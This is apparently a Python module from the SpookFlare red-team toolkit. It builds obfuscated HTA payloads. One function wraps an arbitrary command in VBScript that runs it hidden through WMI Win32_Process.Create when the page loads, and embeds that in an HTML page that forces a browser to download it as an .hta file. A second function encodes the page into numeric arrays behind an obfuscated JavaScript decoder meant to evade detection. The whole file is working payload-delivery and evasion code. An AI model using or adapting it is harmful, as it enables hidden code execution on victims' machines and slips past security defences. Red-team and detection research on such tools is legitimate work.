github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/SpookFlare/lib/sfhta.py (about) 1 # -*- coding: utf-8 -*- 2 import random 3 import string 4 import base64 5 6 def randomString(): 7 return ''.join([random.choice(string.ascii_letters) for n in range(12)]) 8 9 def generateKey(): 10 keys = "!#+%&/()=?_-*[]$><" 11 return ''.join(random.sample(keys,len(keys))) 12 13 def generateBase(htaCommand, htaFileName): 14 htaKey = generateKey() 15 if "\"" in htaCommand: 16 htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]).replace("\"", "\"\"") 17 else: 18 htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]) 19 20 baseHta = '''<script language="VBScript"> 21 Sub window_onload 22 Set {0} = CreateObject("WbemScripting.SWbemLocator") 23 Set {1} = {0}.ConnectServer() 24 {1}.Security_.ImpersonationLevel=3 25 Set {2} = {1}.Get("Win32_ProcessStartup") 26 Set {3} = {2}.SpawnInstance_ 27 {3}.ShowWindow = 12 28 Set {4} = {1}.Get("Win32_Process") 29 {6} = {4}.Create(Replace("'''+htaPayload+'''", "'''+htaKey+'''", ""), NULL, {3}, {5}) 30 window.close() 31 End Sub 32 </script>''' 33 34 launcherBase = '''<html><head><script type="text/javascript">var {0} = atob("'''+base64.b64encode(baseHta.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString()).encode()).decode()+'''");var {1} = "'''+htaFileName+'''.hta";var {2} = new Blob([{0}], {{type: 'plain/text;charset=utf-8;'}});var {3} = null;if (navigator.msSaveBlob) {{{3} = navigator.msSaveBlob({2}, {1});}} else {{{3} = window.URL.createObjectURL({2});}}var {4} = document.createElement('a');{4}.href = {3};{4}.setAttribute('download', {1});document.body.appendChild({4});{4}.click();document.body.removeChild({4});</script></head></body></html>''' 35 launcherFinal = launcherBase.format(randomString(), randomString(), randomString(), randomString(), randomString()) 36 return launcherFinal 37 cdata = " " 38 def obfuscateHta(launcherFinal): 39 finalPayload = "<html><body><head><script type=\"text/javascript\">var {0}=new Array;" 40 stcData = [] 41 i = 0 42 cdata = " " 43 while i < len(list(launcherFinal)): 44 stringToChar = ord(list(list(launcherFinal))[i]) 45 i+=1 46 if i != len(list(launcherFinal)) - 0: 47 stcData.append(str(stringToChar)) 48 else: 49 stcData.append(str(stringToChar)) 50 deep = len(stcData) 51 if deep % 4 == 0: 52 i = 0 53 x = -1 54 while i < deep: 55 code = (int(stcData[i]) * 256 + int(stcData[i+1])) 56 code =+ ((code * 256 ** 2) / 256 + int(stcData[i+2])) 57 code =+ ((code * 256 ** 3) / 256 ** 2 + int(stcData[i+3])) 58 i += 4 59 x +=1 60 finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";" 61 elif deep % 4 == 3: 62 cdata = stcData [deep - 3:deep] 63 ndata = stcData [0:deep - 3] 64 i = 0 65 x = -1 66 while i < deep - 3: 67 code = (int(ndata[i]) * 256 + int(ndata[i+1])) 68 code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) 69 code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) 70 i += 4 71 x +=1 72 finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";" 73 ccode = (int(cdata[0]) * 256 + int(cdata[1])) 74 ccode =+ ((ccode * 256 ** 2) / 256 + int(cdata[2])) 75 finalPayload += "{0}["+ str(x + 1) + "]=" + str(ccode) + ";" 76 elif deep % 4 == 2: 77 cdata = stcData [deep - 2:deep] 78 ndata = stcData [0:deep - 2] 79 i = 0 80 x = -1 81 while i < deep - 2: 82 code = (int(ndata[i]) * 256 + int(ndata[i+1])) 83 code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) 84 code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) 85 i += 4 86 x +=1 87 finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";" 88 ccode = (int(cdata[0]) * 256 + int(cdata[1])) 89 finalPayload +="{0}["+ str(x + 1) + "]=" + str(ccode) + ";" 90 elif deep % 4 == 1: 91 cdata = stcData [deep - 1:deep] 92 ndata = stcData [0:deep - 1] 93 i = 0 94 x = -1 95 while i < deep - 1: 96 code = (int(ndata[i]) * 256 + int(ndata[i+1])) 97 code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) 98 code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) 99 i += 4 100 x +=1 101 finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";" 102 103 finalPayload +="var {1}=\"\";for(i=0;i<{0}.length;i++){2}={0}[i],Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))));document.write({1});</script></head></body></html>" 104 return finalPayload.format(randomString(), randomString(), randomString())